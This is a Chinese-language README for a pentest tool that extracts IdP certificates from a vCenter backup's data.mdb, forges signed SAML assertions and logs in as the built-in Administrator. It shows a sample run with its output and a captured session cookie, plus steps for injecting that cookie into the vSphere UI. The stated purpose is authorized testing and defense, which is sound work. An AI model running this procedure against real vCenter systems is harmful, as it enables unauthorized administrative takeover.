一款用于从 vCenter 备份中提取身份提供程序(IdP)证书并以 Administrator 身份登录的工具
通常在渗透测试任务中,我们会通过近期披露的 CVE 获得文件服务器上 vCenter 备份的访问权限,或获得 VCSA 主机的 root 权限。登录 vCenter vSphere UI 可以让我们轻松访问更多系统、获取机密信息,并向客户展示这些发现的影响。
data.mdb 文件包含这些证书,可在 vCenter 备份中找到,也可在具有 root 权限的 VCSA 主机上找到。这些证书以明文存储,可用于为任何用户(包括内置的 Administrator)签署任何 SAML 身份验证请求。
如果您想了解此工具的更多用例以及我们如何利用它获得 vCenter 主机的管理员访问权限,请查看我们的博客文章:https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
使用上述 Cookie,访问位于 https://<VCSA>/ui 的 VCSA 实例,在 /ui 路径下添加该 Cookie,然后重新浏览至 https://<VCSA>/ui。

本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除明确授权的情况外,不应用于攻击系统。项目维护者不对软件的滥用负责或承担任何责任。请负责任地使用。